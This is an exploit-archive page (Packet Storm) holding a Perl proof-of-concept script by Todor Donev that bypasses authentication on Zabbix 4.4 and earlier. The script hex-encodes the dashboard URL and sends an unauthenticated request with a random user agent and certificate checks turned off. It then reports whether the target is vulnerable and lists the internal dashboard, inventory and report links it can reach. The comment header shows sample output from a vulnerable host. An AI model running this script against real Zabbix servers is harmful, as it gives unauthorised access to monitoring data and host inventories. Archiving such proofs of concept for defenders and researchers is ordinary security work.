exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Zabbix 4.4 Authentication Bypass

Zabbix 4.4 Authentication Bypass
Posted Oct 7, 2019
Authored by Todor Donev

Zabbix versions 4.4 and below authentication bypass demo proof of concept exploit.

tags | exploit, proof of concept, bypass
SHA-256 | d0a25dfdbf661146e307d66927ea7b6a754be8c3f95ccc3d2c4f1c7ede12e3d0

Zabbix 4.4 Authentication Bypass

Change Mirror Download
#!/usr/bin/perl -w
#
# Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
# # [ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Initializing the browser
# # [ >>> Referer =>
# # [ >>> User-Agent => Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1
# # [ >>> Content-Type => application/x-www-form-urlencoded
# # [ <<< Cache-Control => no-store, no-cache, must-revalidate
# # [ <<< Connection => close
# # [ <<< Date => Mon, 07 Oct 2019 12:29:54 GMT
# # [ <<< Pragma => no-cache
# # [ <<< Server => nginx
# # [ <<< Vary => Accept-Encoding
# # [ <<< Content-Type => text/html; charset=UTF-8
# # [ <<< Expires => Thu, 19 Nov 1981 08:52:00 GMT
# # [ <<< Client-Date => Mon, 07 Oct 2019 12:29:54 GMT
# # [ <<< Client-Peer =>
# # [ <<< Client-Response-Num => 1
# # [ <<< Client-SSL-Cert-Issuer =>
# # [ <<< Client-SSL-Cert-Subject =>
# # [ <<< Client-SSL-Cipher => ECDHE-RSA-AES128-GCM-SHA256
# # [ <<< Client-SSL-Socket-Class => IO::Socket::SSL
# # [ <<< Client-SSL-Warning => Peer certificate not verified
# # [ <<< Client-Transfer-Encoding => chunked
# # [ <<< Link => <favicon.ico>; rel="icon"<assets/img/apple-touch-icon-76x76-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="76x76"<assets/img/apple-touch-icon-120x120-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="120x120"<assets/img/apple-touch-icon-152x152-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="152x152"<assets/img/apple-touch-icon-180x180-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="180x180"<assets/img/touch-icon-192x192.png>; rel="icon"; sizes="192x192"<assets/styles/dark-theme.css>; rel="stylesheet"; type="text/css"
# # [ <<< Set-Cookie => zbx_sessionid=e125efe43b1f67b0fdbfb4db2fa1ce0d; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnly
# # [ <<< Strict-Transport-Security => max-age=63072000; includeSubdomains; preload
# # [ <<< Title => TARGET: Dashboard
# # [ <<< X-Content-Type-Options => nosniff
# # [ <<< X-Frame-Options => SAMEORIGIN
# # [ <<< X-Meta-Author => Zabbix SIA
# # [ <<< X-Meta-Charset => utf-8
# # [ <<< X-Meta-Csrf-Token => fdbfb4db2fa1ce0d
# # [ <<< X-Meta-Msapplication-Config => none
# # [ <<< X-Meta-Msapplication-TileColor => #d40000
# # [ <<< X-Meta-Msapplication-TileImage => assets/img/ms-tile-144x144.png
# # [ <<< X-Meta-Viewport => width=device-width, initial-scale=1
# # [ <<< X-UA-Compatible => IE=Edge
# # [ <<< X-XSS-Protection => 1; mode=block
# # [
# # [ The target is vulnerable. Try to open these links:
# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view
# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1
# # [ https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1
# # [ https://TARGET/zabbix/overview.php?ddreset=1
# # [ https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1
# # [ https://TARGET/zabbix/latest.php?ddreset=1
# # [ https://TARGET/zabbix/charts.php?ddreset=1
# # [ https://TARGET/zabbix/screens.php?ddreset=1
# # [ https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1
# # [ https://TARGET/zabbix/srv_status.php?ddreset=1
# # [ https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1
# # [ https://TARGET/zabbix/hostinventories.php?ddreset=1
# # [ https://TARGET/zabbix/report2.php?ddreset=1
# # [ https://TARGET/zabbix/toptriggers.php?ddreset=1
# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.list
# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
my $host = shift || ''; # Full path url to the store
$host =~ s|/$||;
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
print "[ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit\n";
print "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
my $target = $host."\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request);
print "[ >>> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print "[ <<< $_ => ", $response->header($_), "\n" for $response->header_field_names;
print "[ Exploit failed! 401 Unauthorized!\n" and exit if ($response->code eq '401');
print "[ Exploit failed! 403 Forbidden!\n" and exit if ($response->code eq '403');
if (defined ($response->as_string()) && ($response->as_string() =~ m/Dashboard/)){
print "[\n[ The target is vulnerable. Try to open these links:\n";
my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
my @files = $tree->look_down(_tag => 'a');
for my $line (@files){
next if ($line->attr('href') =~ m/javascript/);
next if ($line->attr('href') =~ m/\#/);
next if ($line->attr('href') =~ m/http/);
print "[ ", $host."/zabbix/".$line->attr('href'), "\n";
}
} else {
print "[ Exploit failed! The target isn't vulnerable\n";
exit;
}
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close